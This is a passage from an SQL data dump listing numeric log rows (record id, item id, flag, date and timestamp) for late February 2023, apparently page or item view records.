06:48:41'),(70247,3297,1,'2023-02-23','2023-02-23 06:52:56'),(70248,2769,1,'2023-02-23','2023-02-23 07:21:07'),(70249,80,1,'2023-02-23','2023-02-23 07:23:15'),(70250,68,1,'2023-02-23','2023-02-23 07:23:20'),(70251,108,1,'2023-02-23','2023-02-23 07:23:25'),(70252,1544,1,'2023-02-23','2023-02-23 07:51:20'),(70253,2309,1,'2023-02-23','2023-02-23 08:01:04'),(70254,2063,1,'2023-02-23','2023-02-23 08:25:28'),(70255,3675,1,'2023-02-23','2023-02-23 08:39:54'),(70256,1602,1,'2023-02-23','2023-02-23 09:08:21'),(70257,467,1,'2023-02-23','2023-02-23 09:21:28'),(70258,5268,1,'2023-02-23','2023-02-23 09:21:53'),(70259,5131,1,'2023-02-23','2023-02-23 09:29:42'),(70260,1602,1,'2023-02-23','2023-02-23 09:31:19'),(70261,1582,1,'2023-02-23','2023-02-23 10:32:03'),(70262,4709,1,'2023-02-23','2023-02-23 10:33:29'),(70263,1544,1,'2023-02-23','2023-02-23 10:48:29'),(70264,1544,1,'2023-02-23','2023-02-23 10:50:09'),(70265,1544,1,'2023-02-23','2023-02-23 11:19:07'),(70266,4771,1,'2023-02-23','2023-02-23 11:38:31'),(70267,1544,1,'2023-02-23','2023-02-23 11:51:06'),(70268,3004,1,'2023-02-23','2023-02-23 12:11:14'),(70269,3004,1,'2023-02-23','2023-02-23 12:11:42'),(70270,1544,1,'2023-02-23','2023-02-23 13:33:48'),(70271,3087,1,'2023-02-23','2023-02-23 13:44:45'),(70272,4587,1,'2023-02-23','2023-02-23 14:46:13'),(70273,4963,1,'2023-02-23','2023-02-23 16:21:58'),(70274,473,1,'2023-02-23','2023-02-23 16:29:27'),(70275,1872,1,'2023-02-23','2023-02-23 16:29:27'),(70276,3102,1,'2023-02-23','2023-02-23 16:29:32'),(70277,2813,1,'2023-02-23','2023-02-23 16:46:44'),(70278,4944,1,'2023-02-23','2023-02-23 16:55:11'),(70279,3090,1,'2023-02-23','2023-02-23 17:12:20'),(70280,3104,1,'2023-02-23','2023-02-23 17:35:58'),(70281,4963,1,'2023-02-23','2023-02-23 17:55:56'),(70282,3090,1,'2023-02-23','2023-02-23 18:41:13'),(70283,1592,1,'2023-02-23','2023-02-23 18:53:13'),(70284,4960,1,'2023-02-23','2023-02-23 18:56:29'),(70285,4608,1,'2023-02-23','2023-02-23 19:49:00'),(70286,3781,1,'2023-02-23','2023-02-23 20:09:09'),(70287,5276,1,'2023-02-23','2023-02-23 22:58:40'),(70288,1608,1,'2023-02-24','2023-02-24 01:05:20'),(70289,3664,1,'2023-02-24','2023-02-24 01:06:06'),(70290,91,1,'2023-02-24','2023-02-24 01:18:04'),(70291,3307,1,'2023-02-24','2023-02-24 01:51:18'),(70292,3285,1,'2023-02-24','2023-02-24 02:05:23'),(70293,3038,1,'2023-02-24','2023-02-24 02:21:13'),(70294,4950,1,'2023-02-24','2023-02-24 02:37:00'),(70295,3271,1,'2023-02-24','2023-02-24 02:40:59'),(70296,3127,1,'2023-02-24','2023-02-24 03:00:31'),(70297,5271,1,'2023-02-24','2023-02-24 03:11:15'),(70298,1604,1,'2023-02-24','2023-02-24 03:22:08'),(70299,4457,1,'2023-02-24','2023-02-24 03:56:49'),(70300,4729,1,'2023-02-24','2023-02-24 04:14:07'),(70301,4238,1,'2023-02-24','2023-02-24 04:43:01'),(70302,5268,1,'2023-02-24','2023-02-24 04:50:50'),(70303,570,1,'2023-02-24','2023-02-24 04:52:13'),(70304,89,1,'2023-02-24','2023-02-24 05:31:33'),(70305,4363,1,'2023-02-24','2023-02-24 05:53:44'),(70306,3004,1,'2023-02-24','2023-02-24 06:39:10'),(70307,2769,1,'2023-02-24','2023-02-24 06:45:02'),(70308,4377,1,'2023-02-24','2023-02-24 06:46:54'),(70309,4911,1,'2023-02-24','2023-02-24 08:03:27'),(70310,3742,1,'2023-02-24','2023-02-24 09:20:51'),(70311,3090,1,'2023-02-24','2023-02-24 09:59:09'),(70312,3090,1,'2023-02-24','2023-02-24 10:01:05'),(70313,1722,1,'2023-02-24','2023-02-24 10:08:38'),(70314,2904,1,'2023-02-24','2023-02-24 10:09:18'),(70315,2904,1,'2023-02-24','2023-02-24 10:09:22'),(70316,102,1,'2023-02-24','2023-02-24 10:09:37'),(70317,2904,1,'2023-02-24','2023-02-24 10:09:55'),(70318,3764,1,'2023-02-24','2023-02-24 10:24:22'),(70319,474,1,'2023-02-24','2023-02-24 10:42:31'),(70320,68,1,'2023-02-24','2023-02-24 10:42:58'),(70321,1544,1,'2023-02-24','2023-02-24 11:25:48'),(70322,80,1,'2023-02-24','2023-02-24 11:59:28'),(70323,68,1,'2023-02-24','2023-02-24 11:59:35'),(70324,108,1,'2023-02-24','2023-02-24 11:59:39'),(70325,2809,1,'2023-02-24','2023-02-24 14:50:54'),(70326,3253,1,'2023-02-24','2023-02-24 14:51:05'),(70327,1594,1,'2023-02-24','2023-02-24 16:01:50'),(70328,1612,1,'2023-02-24','2023-02-24 16:48:04'),(70329,76,1,'2023-02-24','2023-02-24 16:48:14'),(70330,5001,1,'2023-02-24','2023-02-24 17:00:06'),(70331,3102,1,'2023-02-24','2023-02-24 17:13:42'),(70332,4832,1,'2023-02-24','2023-02-24 17:30:27'),(70333,1877,1,'2023-02-24','2023-02-24 17:43:10'),(70334,473,1,'2023-02-24','2023-02-24 17:43:10'),(70335,5042,1,'2023-02-24','2023-02-24 18:13:24'),(70336,1598,1,'2023-02-24','2023-02-24 18:15:12'),(70337,5157,1,'2023-02-24','2023-02-24 18:17:31'),(70338,3253,1,'2023-02-24','2023-02-24 19:27:38'),(70339,4494,1,'2023-02-24','2023-02-24 20:46:37'),(70340,3714,1,'2023-02-24','2023-02-24 21:31:18'),(70341,4700,1,'2023-02-24','2023-02-24 21:50:19'),(70342,4706,1,'2023-02-24','2023-02-24 23:11:12'),(70343,4966,1,'2023-02-24','2023-02-24 23:50:47'),(70344,2809,1,'2023-02-25','2023-02-25 00:17:19'),(70345,5080,1,'2023-02-25','2023-02-25 00:46:11'),(70346,4448,1,'2023-02-25','2023-02-25 01:42:24'),(70347,4753,1,'2023-02-25','2023-02-25 01:59:08'),(70348,4448,1,'2023-02-25','2023-02-25 02:01:18'),(70349,89,1,'2023-02-25','2023-02-25 03:14:17'),(70350,5248,1,'2023-02-25','2023-02-25 03:20:02'),(70351,72,1,'2023-02-25','2023-02-25 03:23:50'),(70352,72,1,'2023-02-25','2023-02-25 03:24:52'),(70353,72,1,'2023-02-25','2023-02-25 03:25:42'),(70354,2904,1,'2023-02-25','2023-02-25 03:27:40'),(70355,80,1,'2023-02-25','2023-02-25 04:54:45'),(70356,1600,1,'2023-02-25','2023-02-25 05:03:30'),(70357,1722,1,'2023-02-25','2023-02-25 05:23:14'),(70358,3531,1,'2023-02-25','2023-02-25 05:43:51'),(70359,4700,1,'2023-02-25','2023-02-25 05:53:09'),(70360,3489,1,'2023-02-25','2023-02-25 06:02:20'),(70361,4768,1,'2023-02-25','2023-02-25 06:03:03'),(70362,1600,1,'2023-02-25','2023-02-25 06:22:08'),(70363,3069,1,'2023-02-25','2023-02-25 06:36:54'),(70364,87,1,'2023-02-25','2023-02-25 06:40:45'),(70365,468,1,'2023-02-25','2023-02-25 06:41:29'),(70366,3541,1,'2023-02-25','2023-02-25 07:15:39'),(70367,4492,1,'2023-02-25','2023-02-25 07:16:20'),(70368,2751,1,'2023-02-25','2023-02-25 07:29:58'),(70369,1600,1,'2023-02-25','2023-02-25 07:50:39'),(70370,4424,1,'2023-02-25','2023-02-25 07:51:42'),(70371,3498,1,'2023-02-25','2023-02-25 08:15:52'),(70372,4457,1,'2023-02-25','2023-02-25 08:27:49'),(70373,1877,1,'2023-02-25','2023-02-25 10:18:12'),(70374,4420,1,'2023-02-25','2023-02-25 10:53:17'),(70375,1594,1,'2023-02-25','2023-02-25 11:45:38'),(70376,1870,1,'2023-02-25','2023-02-25 12:18:24'),(70377,4966,1,'2023-02-25','2023-02-25 12:44:16'),(70378,4966,1,'2023-02-25','2023-02-25 12:48:14'),(70379,1870,1,'2023-02-25','2023-02-25 12:51:57'),(70380,4420,1,'2023-02-25','2023-02-25 12:53:58'),(70381,4977,1,'2023-02-25','2023-02-25 13:09:49'),(70382,1741,1,'2023-02-25','2023-02-25 13:46:28'),(70383,1734,1,'2023-02-25','2023-02-25 13:47:04'),(70384,3030,1,'2023-02-25','2023-02-25 13:55:06'),(70385,3034,1,'2023-02-25','2023-02-25 14:19:32'),(70386,1600,1,'2023-02-25','2023-02-25 14:28:06'),(70387,470,1,'2023-02-25','2023-02-25 15:35:06'),(70388,2904,1,'2023-02-25','2023-02-25 15:51:25'),(70389,5062,1,'2023-02-25','2023-02-25 17:07:54'),(70390,5140,1,'2023-02-25','2023-02-25 17:30:12'),(70391,1582,1,'2023-02-25','2023-02-25 17:55:52'),(70392,5256,1,'2023-02-25','2023-02-25 18:47:36'),(70393,5157,1,'2023-02-25','2023-02-25 19:42:36'),(70394,4963,1,'2023-02-25','2023-02-25 20:13:00'),(70395,468,1,'2023-02-25','2023-02-25 20:17:28'),(70396,4966,1,'2023-02-25','2023-02-25 20:21:38'),(70397,4542,1,'2023-02-25','2023-02-25 20:55:57'),(70398,4785,1,'2023-02-25','2023-02-25 21:02:32'),(70399,468,1,'2023-02-25','2023-02-25 21:47:31'),(70400,2989,1,'2023-02-25','2023-02-25 22:03:44'),(70401,1709,1,'2023-02-25','2023-02-25 22:28:22'),(70402,4759,1,'2023-02-25','2023-02-25 23:33:26'),(70403,4436,1,'2023-02-26','2023-02-26 00:09:11'),(70404,4977,1,'2023-02-26','2023-02-26 00:14:21'),(70405,4753,1,'2023-02-26','2023-02-26 00:26:45'),(70406,470,1,'2023-02-26','2023-02-26 01:02:47'),(70407,487,1,'2023-02-26','2023-02-26 02:03:54'),(70408,4980,1,'2023-02-26','2023-02-26 02:28:12'),(70409,4759,1,'2023-02-26','2023-02-26 02:52:58'),(70410,468,1,'2023-02-26','2023-02-26 03:17:48'),(70411,473,1,'2023-02-26','2023-02-26 03:42:37'),(70412,4301,1,'2023-02-26','2023-02-26 03:58:15'),(70413,89,1,'2023-02-26','2023-02-26 06:46:19'),(70414,1594,1,'2023-02-26','2023-02-26 08:20:34'),(70415,1709,1,'2023-02-26','2023-02-26 08:50:41'),(70416,570,1,'2023-02-26','2023-02-26 08:56:22'),(70417,570,1,'2023-02-26','2023-02-26 09:13:52'),(70418,5020,1,'2023-02-26','2023-02-26 09:20:47'),(70419,4960,1,'2023-02-26','2023-02-26 09:58:29'),(70420,4893,1,'2023-02-26','2023-02-26 10:17:04'),(70421,4966,1,'2023-02-26','2023-02-26 10:31:30'),(70422,4911,1,'2023-02-26','2023-02-26 11:00:51'),(70423,1588,1,'2023-02-26','2023-02-26 11:59:37'),(70424,2617,1,'2023-02-26','2023-02-26 12:11:47'),(70425,1598,1,'2023-02-26','2023-02-26 12:24:06'),(70426,2457,1,'2023-02-26','2023-02-26 12:36:10'),(70427,4457,1,'2023-02-26','2023-02-26 13:26:59'),(70428,1718,1,'2023-02-26','2023-02-26 13:33:13'),(70429,1594,1,'2023-02-26','2023-02-26 13:34:02'),(70430,68,1,'2023-02-26','2023-02-26 13:58:53'),(70431,4944,1,'2023-02-26','2023-02-26 14:48:30'),(70432,3781,1,'2023-02-26','2023-02-26 15:25:13'),(70433,4938,1,'2023-02-26','2023-02-26 15:54:41'),(70434,4412,1,'2023-02-26','2023-02-26 16:19:36'),(70435,4457,1,'2023-02-26','2023-02-26 16:19:49'),(70436,5054,1,'2023-02-26','2023-02-26 16:48:16'),(70437,4938,1,'2023-02-26','2023-02-26 16:53:31'),(70438,1588,1,'2023-02-26','2023-02-26 17:13:38'),(70439,4738,1,'2023-02-26','2023-02-26 18:13:15'),(70440,1596,1,'2023-02-26','2023-02-26 18:26:17'),(70441,3764,1,'2023-02-26','2023-02-26 20:08:30'),(70442,2309,1,'2023-02-26','2023-02-26 20:37:58'),(70443,89,1,'2023-02-26','2023-02-26 21:09:59'),(70444,4837,1,'2023-02-26','2023-02-26 23:31:04'),(70445,3004,1,'2023-02-26','2023-02-26 23:49:07'),(70446,3781,1,'2023-02-27','2023-02-27 01:30:56'),(70447,4520,1,'2023-02-27','2023-02-27 02:10:41'),(70448,4966,1,'2023-02-27','2023-02-27 02:49:21'),(70449,2775,1,'2023-02-27','2023-02-27 03:00:35'),(70450,4966,1,'2023-02-27','2023-02-27 03:06:08'),(70451,3479,1,'2023-02-27','2023-02-27 03:18:11'),(70452,3102,1,'2023-02-27','2023-02-27 03:40:40'),(70453,1582,1,'2023-02-27','2023-02-27 05:19:49'),(70454,4966,1,'2023-02-27','2023-02-27 05:44:12'),(70455,1614,1,'2023-02-27','2023-02-27 05:55:53'),(70456,1724,1,'2023-02-27','2023-02-27 06:16:13'),(70457,2457,1,'2023-02-27','2023-02-27 07:23:56'),(70458,68,1,'2023-02-27','2023-02-27 07:26:32'),(70459,2617,1,'2023-02-27','2023-02-27 08:33:20'),(70460,474,1,'2023-02-27','2023-02-27 09:28:08'),(70461,473,1,'2023-02-27','2023-02-27 09:28:08'),(70462,5163,1,'2023-02-27','2023-02-27 09:30:27'),(70463,5163,1,'2023-02-27','2023-02-27 09:34:11'),(70464,5163,1,'2023-02-27','2023-02-27 09:34:21'),(70465,4529,1,'2023-02-27','2023-02-27 10:06:51'),(70466,3764,1,'2023-02-27','2023-02-27 10:06:52'),(70467,4776,1,'2023-02-27','2023-02-27 10:07:45'),(70468,5268,1,'2023-02-27','2023-02-27 10:08:19'),(70469,4524,1,'2023-02-27','2023-02-27 10:08:20'),(70470,1877,1,'2023-02-27','2023-02-27 10:10:11'),(70471,473,1,'2023-02-27','2023-02-27 10:10:16'),(70472,1592,1,'2023-02-27','2023-02-27 10:34:05'),(70473,68,1,'2023-02-27','2023-02-27 10:41:16'),(70474,5163,1,'2023-02-27','2023-02-27 11:24:25'),(70475,2148,1,'2023-02-27','2023-02-27 11:34:31'),(70476,2148,1,'2023-02-27','2023-02-27 11:34:54'),(70477,76,1,'2023-02-27','2023-02-27 11:35:48'),(70478,76,1,'2023-02-27','2023-02-27 11:36:10'),(70479,2148,1,'2023-02-27','2023-02-27 11:36:48'),(70480,76,1,'2023-02-27','2023-02-27 11:37:56'),(70481,2148,1,'2023-02-27','2023-02-27 11:39:15'),(70482,76,1,'2023-02-27','2023-02-27 11:40:35'),(70483,1612,1,'2023-02-27','2023-02-27 14:30:31'),(70484,1594,1,'2023-02-27','2023-02-27 14:45:32'),(70485,1544,1,'2023-02-27','2023-02-27 15:23:23'),(70486,1586,1,'2023-02-27','2023-02-27 15:42:21'),(70487,4762,1,'2023-02-27','2023-02-27 15:51:23'),(70488,1598,1,'2023-02-27','2023-02-27 16:10:14'),(70489,76,1,'2023-02-27','2023-02-27 16:11:06'),(70490,1602,1,'2023-02-27','2023-02-27 16:37:48'),(70491,3313,1,'2023-02-27','2023-02-27 17:06:15'),(70492,5163,1,'2023-02-27','2023-02-27 17:09:58'),(70493,5033,1,'2023-02-27','2023-02-27 17:11:58'),(70494,5163,1,'2023-02-27','2023-02-27 17:12:58'),(70495,2503,1,'2023-02-27','2023-02-27 17:37:54'),(70496,1614,1,'2023-02-27','2023-02-27 18:00:42'),(70497,2297,1,'2023-02-27','2023-02-27 18:47:10'),(70498,4457,1,'2023-02-27','2023-02-27 19:12:37'),(70499,4988,1,'2023-02-27','2023-02-27 19:25:05'),(70500,2419,1,'2023-02-27','2023-02-27 20:06:48'),(70501,5153,1,'2023-02-27','2023-02-27 20:12:28'),(70502,2297,1,'2023-02-27','2023-02-27 20:26:43'),(70503,4457,1,'2023-02-27','2023-02-27 20:49:27'),(70504,5253,1,'2023-02-27','2023-02-27 21:03:30'),(70505,5137,1,'2023-02-27','2023-02-27 21:10:54'),(70506,5253,1,'2023-02-27','2023-02-27 21:11:08'),(70507,2751,1,'2023-02-27','2023-02-27 21:11:31'),(70508,469,1,'2023-02-27','2023-02-27 21:42:26'),(70509,4911,1,'2023-02-27','2023-02-27 22:15:19'),(70510,5122,1,'2023-02-28','2023-02-28 02:50:18'),(70511,4768,1,'2023-02-28','2023-02-28 02:50:23'),(70512,3774,1,'2023-02-28','2023-02-28 02:50:27'),(70513,4722,1,'2023-02-28','2023-02-28 02:50:31'),(70514,3714,1,'2023-02-28','2023-02-28 02:50:36'),(70515,3297,1,'2023-02-28','2023-02-28 02:50:40'),(70516,3721,1,'2023-02-28','2023-02-28 02:50:45'),(70517,4765,1,'2023-02-28','2023-02-28 02:50:49'),(70518,4517,1,'2023-02-28','2023-02-28 02:50:53'),(70519,4712,1,'2023-02-28','2023-02-28 02:50:58'),(70520,3749,1,'2023-02-28','2023-02-28 02:51:02'),(70521,4753,1,'2023-02-28','2023-02-28 02:51:06'),(70522,4663,1,'2023-02-28','2023-02-28 02:51:11'),(70523,4660,1,'2023-02-28','2023-02-28 02:51:15'),(70524,5125,1,'2023-02-28','2023-02-28 02:51:19'),(70525,3752,1,'2023-02-28','2023-02-28 02:51:24'),(70526,3117,1,'2023-02-28','2023-02-28 02:51:28'),(70527,3069,1,'2023-02-28','2023-02-28 02:51:32'),(70528,5253,1,'2023-02-28','2023-02-28 02:51:37'),(70529,5128,1,'2023-02-28','2023-02-28 02:51:41'),(70530,3307,1,'2023-02-28','2023-02-28 02:51:45'),(70531,4759,1,'2023-02-28','2023-02-28 02:51:58'),(70532,4747,1,'2023-02-28','2023-02-28 02:52:02'),(70533,3710,1,'2023-02-28','2023-02-28 02:52:07'),(70534,4551,1,'2023-02-28','2023-02-28 02:52:11'),(70535,4323,1,'2023-02-28','2023-02-28 02:52:15'),(70536,3316,1,'2023-02-28','2023-02-28 02:52:19'),(70537,3072,1,'2023-02-28','2023-02-28 02:52:24'),(70538,3534,1,'2023-02-28','2023-02-28 02:52:28'),(70539,4988,1,'2023-02-28','2023-02-28 02:52:32'),(70540,5134,1,'2023-02-28','2023-02-28 02:52:36'),(70541,4648,1,'2023-02-28','2023-02-28 02:52:41'),(70542,3438,1,'2023-02-28','2023-02-28 02:52:45'),(70543,4762,1,'2023-02-28','2023-02-28 02:52:49'),(70544,4771,1,'2023-02-28','2023-02-28 02:52:54'),(70545,3127,1,'2023-02-28','2023-02-28 02:52:58'),(70546,4657,1,'2023-02-28','2023-02-28 02:53:03'),(70547,4980,1,'2023-02-28','2023-02-28 02:53:07'),(70548,4983,1,'2023-02-28','2023-02-28 02:53:11'),(70549,4566,1,'2023-02-28','2023-02-28 02:53:16'),(70550,4681,1,'2023-02-28','2023-02-28 02:53:20'),(70551,3066,1,'2023-02-28','2023-02-28 02:53:24'),(70552,4694,1,'2023-02-28','2023-02-28 02:53:29'),(70553,3777,1,'2023-02-28','2023-02-28 02:53:33'),(70554,4668,1,'2023-02-28','2023-02-28 02:53:37'),(70555,3727,1,'2023-02-28','2023-02-28 02:53:42'),(70556,4691,1,'2023-02-28','2023-02-28 02:53:46'),(70557,3430,1,'2023-02-28','2023-02-28 02:53:50'),(70558,4341,1,'2023-02-28','2023-02-28 02:53:55'),(70559,3124,1,'2023-02-28','2023-02-28 02:53:59'),(70560,3498,1,'2023-02-28','2023-02-28 02:54:03'),(70561,4977,1,'2023-02-28','2023-02-28 02:54:08'),(70562,4645,1,'2023-02-28','2023-02-28 02:54:12'),(70563,4703,1,'2023-02-28','2023-02-28 02:54:16'),(70564,5280,1,'2023-02-28','2023-02-28 02:54:21'),(70565,3738,1,'2023-02-28','2023-02-28 02:54:25'),(70566,4514,1,'2023-02-28','2023-02-28 02:54:29'),(70567,3489,1,'2023-02-28','2023-02-28 02:54:33'),(70568,4332,1,'2023-02-28','2023-02-28 02:54:38'),(70569,4400,1,'2023-02-28','2023-02-28 02:54:42'),(70570,3771,1,'2023-02-28','2023-02-28 02:54:46'),(70571,5137,1,'2023-02-28','2023-02-28 02:54:51'),(70572,4685,1,'2023-02-28','2023-02-28 02:54:57'),(70573,3731,1,'2023-02-28','2023-02-28 02:55:01'),(70574,4677,1,'2023-02-28','2023-02-28 02:55:06'),(70575,4700,1,'2023-02-28','2023-02-28 02:55:10'),(70576,4651,1,'2023-02-28','2023-02-28 02:55:14'),(70577,4674,1,'2023-02-28','2023-02-28 02:55:19'),(70578,4744,1,'2023-02-28','2023-02-28 02:55:23'),(70579,4697,1,'2023-02-28','2023-02-28 02:55:27'),(70580,3746,1,'2023-02-28','2023-02-28 02:55:32'),(70581,5131,1,'2023-02-28','2023-02-28 02:55:36'),(70582,4741,1,'2023-02-28','2023-02-28 02:55:41'),(70583,3724,1,'2023-02-28','2023-02-28 02:55:45'),(70584,4338,1,'2023-02-28','2023-02-28 02:55:49'),(70585,5256,1,'2023-02-28','2023-02-28 02:55:54'),(70586,4582,1,'2023-02-28','2023-02-28 02:55:58'),(70587,5101,1,'2023-02-28','2023-02-28 02:56:02'),(70588,3063,1,'2023-02-28','2023-02-28 02:56:07'),(70589,5276,1,'2023-02-28','2023-02-28 02:56:11'),(70590,4996,1,'2023-02-28','2023-02-28 02:56:15'),(70591,4688,1,'2023-02-28','2023-02-28 02:56:20'),(70592,4275,1,'2023-02-28','2023-02-28 02:56:24'),(70593,4454,1,'2023-02-28','2023-02-28 02:56:28'),(70594,3090,1,'2023-02-28','2023-02-28 02:56:33'),(70595,3735,1,'2023-02-28','2023-02-28 02:56:37'),(70596,4706,1,'2023-02-28','2023-02-28 02:56:41'),(70597,4709,1,'2023-02-28','2023-02-28 02:56:46'),(70598,4750,1,'2023-02-28','2023-02-28 02:56:51'),(70599,4335,1,'2023-02-28','2023-02-28 02:56:55'),(70600,4756,1,'2023-02-28','2023-02-28 02:56:59'),(70601,4976,1,'2023-02-28','2023-02-28 02:57:04'),(70602,3486,1,'2023-02-28','2023-02-28 02:57:08'),(70603,3531,1,'2023-02-28','2023-02-28 02:57:13'),(70604,4654,1,'2023-02-28','2023-02-28 02:57:17'),(70605,3313,1,'2023-02-28','2023-02-28 02:57:21'),(70606,4520,1,'2023-02-28','2023-02-28 02:57:26'),(70607,4329,1,'2023-02-28','2023-02-28 02:57:31'),(70608,4326,1,'2023-02-28','2023-02-28 02:57:35'),(70609,3290,1,'2023-02-28','2023-02-28 02:57:50'),(70610,5122,1,'2023-02-28','2023-02-28 02:59:42'),(70611,4768,1,'2023-02-28','2023-02-28 02:59:48'),(70612,3774,1,'2023-02-28','2023-02-28 02:59:53'),(70613,4722,1,'2023-02-28','2023-02-28 02:59:58'),(70614,3714,1,'2023-02-28','2023-02-28 03:00:03'),(70615,3721,1,'2023-02-28','2023-02-28 03:00:10'),(70616,4765,1,'2023-02-28','2023-02-28 03:00:17'),(70617,4517,1,'2023-02-28','2023-02-28 03:00:25'),(70618,4712,1,'2023-02-28','2023-02-28 03:00:29'),(70619,3749,1,'2023-02-28','2023-02-28 03:00:34'),(70620,4753,1,'2023-02-28','2023-02-28 03:00:38'),(70621,4663,1,'2023-02-28','2023-02-28 03:00:43'),(70622,4660,1,'2023-02-28','2023-02-28 03:00:48'),(70623,5125,1,'2023-02-28','2023-02-28 03:00:53'),(70624,3752,1,'2023-02-28','2023-02-28 03:00:58'),(70625,5253,1,'2023-02-28','2023-02-28 03:01:03'),(70626,5128,1,'2023-02-28','2023-02-28 03:01:08'),(70627,3307,1,'2023-02-28','2023-02-28 03:01:12'),(70628,4759,1,'2023-02-28','2023-02-28 03:01:17'),(70629,4747,1,'2023-02-28','2023-02-28 03:01:23'),(70630,3710,1,'2023-02-28','2023-02-28 03:01:29'),(70631,4551,1,'2023-02-28','2023-02-28 03:01:34'),(70632,5271,1,'2023-02-28','2023-02-28 03:01:40'),(70633,4323,1,'2023-02-28','2023-02-28 03:01:46'),(70634,3316,1,'2023-02-28','2023-02-28 03:01:53'),(70635,3534,1,'2023-02-28','2023-02-28 03:02:02'),(70636,4988,1,'2023-02-28','2023-02-28 03:02:09'),(70637,5134,1,'2023-02-28','2023-02-28 03:02:14'),(70638,4648,1,'2023-02-28','2023-02-28 03:02:20'),(70639,3781,1,'2023-02-28','2023-02-28 03:02:27'),(70640,3438,1,'2023-02-28','2023-02-28 03:02:34'),(70641,4762,1,'2023-02-28','2023-02-28 03:02:40'),(70642,4771,1,'2023-02-28','2023-02-28 03:02:46'),(70643,5268,1,'2023-02-28','2023-02-28 03:02:52'),(70644,4657,1,'2023-02-28','2023-02-28 03:02:56'),(70645,4980,1,'2023-02-28','2023-02-28 03:03:03'),(70646,4983,1,'2023-02-28','2023-02-28 03:03:08'),(70647,4529,1,'2023-02-28','2023-02-28 03:03:14'),(70648,4566,1,'2023-02-28','2023-02-28 03:03:20'),(70649,4681,1,'2023-02-28','2023-02-28 03:03:26'),(70650,4694,1,'2023-02-28','2023-02-28 03:03:32'),(70651,3777,1,'2023-02-28','2023-02-28 03:03:38'),(70652,3742,1,'2023-02-28','2023-02-28 03:03:42'),(70653,4668,1,'2023-02-28','2023-02-28 03:03:48'),(70654,3727,1,'2023-02-28','2023-02-28 03:03:52'),(70655,4691,1,'2023-02-28','2023-02-28 03:03:57'),(70656,3430,1,'2023-02-28','2023-02-28 03:04:01'),(70657,4341,1,'2023-02-28','2023-02-28 03:04:06'),(70658,3498,1,'2023-02-28','2023-02-28 03:04:11'),(70659,4977,1,'2023-02-28','2023-02-28 03:04:15'),(70660,3479,1,'2023-02-28','2023-02-28 03:04:20'),(70661,4645,1,'2023-02-28','2023-02-28 03:04:25'),(70662,4703,1,'2023-02-28','2023-02-28 03:04:29'),(70663,5280,1,'2023-02-28','2023-02-28 03:04:34'),(70664,4524,1,'2023-02-28','2023-02-28 03:04:38'),(70665,3738,1,'2023-02-28','2023-02-28 03:04:43'),(70666,4514,1,'2023-02-28','2023-02-28 03:04:47'),(70667,3489,1,'2023-02-28','2023-02-28 03:04:52'),(70668,4332,1,'2023-02-28','2023-02-28 03:05:02'),(70669,4400,1,'2023-02-28','2023-02-28 03:05:06'),(70670,3771,1,'2023-02-28','2023-02-28 03:05:11'),(70671,5137,1,'2023-02-28','2023-02-28 03:05:15'),(70672,4685,1,'2023-02-28','2023-02-28 03:05:19'),(70673,3731,1,'2023-02-28','2023-02-28 03:05:24'),(70674,4677,1,'2023-02-28','2023-02-28 03:05:30'),(70675,4700,1,'2023-02-28','2023-02-28 03:05:35'),(70676,4651,1,'2023-02-28','2023-02-28 03:05:39'),(70677,4674,1,'2023-02-28','2023-02-28 03:05:44'),(70678,4744,1,'2023-02-28','2023-02-28 03:05:48'),(70679,4697,1,'2023-02-28','2023-02-28 03:05:53'),(70680,3746,1,'2023-02-28','2023-02-28 03:05:59'),(70681,5131,1,'2023-02-28','2023-02-28 03:06:05'),(70682,4776,1,'2023-02-28','2023-02-28 03:06:10'),(70683,4741,1,'2023-02-28','2023-02-28 03:06:16'),(70684,3724,1,'2023-02-28','2023-02-28 03:06:23'),(70685,4338,1,'2023-02-28','2023-02-28 03:06:29'),(70686,5256,1,'2023-02-28','2023-02-28 03:06:35'),(70687,4582,1,'2023-02-28','2023-02-28 03:06:43'),(70688,5101,1,'2023-02-28','2023-02-28 03:06:49'),(70689,3764,1,'2023-02-28','2023-02-28 03:06:55'),(70690,5276,1,'2023-02-28','2023-02-28 03:07:01'),(70691,4996,1,'2023-02-28','2023-02-28 03:07:07'),(70692,4688,1,'2023-02-28','2023-02-28 03:07:13'),(70693,4275,1,'2023-02-28','2023-02-28 03:07:18'),(70694,4454,1,'2023-02-28','2023-02-28 03:07:24'),(70695,3482,1,'2023-02-28','2023-02-28 03:07:29'),(70696,3735,1,'2023-02-28','2023-02-28 03:07:35'),(70697,4706,1,'2023-02-28','2023-02-28 03:07:42'),(70698,4709,1,'2023-02-28','2023-02-28 03:07:47'),(70699,4750,1,'2023-02-28','2023-02-28 03:07:51'),(70700,4335,1,'2023-02-28','2023-02-28 03:07:56'),(70701,4756,1,'2023-02-28','2023-02-28 03:08:02'),(70702,4976,1,'2023-02-28','2023-02-28 03:08:06'),(70703,3486,1,'2023-02-28','2023-02-28 03:08:11'),(70704,3531,1,'2023-02-28','2023-02-28 03:08:16'),(70705,4654,1,'2023-02-28','2023-02-28 03:08:22'),(70706,3313,1,'2023-02-28','2023-02-28 03:08:26'),(70707,4520,1,'2023-02-28','2023-02-28 03:08:31'),(70708,4329,1,'2023-02-28','2023-02-28 03:08:36'),(70709,4326,1,'2023-02-28','2023-02-28 03:08:41'),(70710,3307,1,'2023-02-28','2023-02-28 04:36:59'),(70711,1610,1,'2023-02-28','2023-02-28 04:39:27'),(70712,80,1,'2023-02-28','2023-02-28 05:58:12'),(70713,4576,1,'2023-02-28','2023-02-28 06:06:49'),(70714,1584,1,'2023-02-28','2023-02-28 07:13:45'),(70715,1586,1,'2023-02-28','2023-02-28 08:13:25'),(70716,469,1,'2023-02-28','2023-02-28 08:45:32'),(70717,4566,1,'2023-02-28','2023-02-28 09:15:02'),(70718,5163,1,'2023-02-28','2023-02-28 10:00:33'),(70719,5163,1,'2023-02-28','2023-02-28 11:35:04'),(70720,4960,1,'2023-02-28','2023-02-28 12:02:46'),(70721,5163,1,'2023-02-28','2023-02-28 12:04:37'),(70722,2609,1,'2023-02-28','2023-02-28 12:43:59'),(70723,5163,1,'2023-02-28','2023-02-28 12:49:33'),(70724,4944,1,'2023-02-28','2023-02-28 12:55:16'),(70725,1594,1,'2023-02-28','2023-02-28 14:09:48'),(70726,1713,1,'2023-02-28','2023-02-28 14:26:36'),(70727,4416,1,'2023-02-28','2023-02-28 14:32:29'),(70728,1582,1,'2023-02-28','2023-02-28 14:33:35'),(70729,4960,1,'2023-02-28','2023-02-28 14:45:52'),(70730,1612,1,'2023-02-28','2023-02-28 15:10:00'),(70731,2309,1,'2023-02-28','2023-02-28 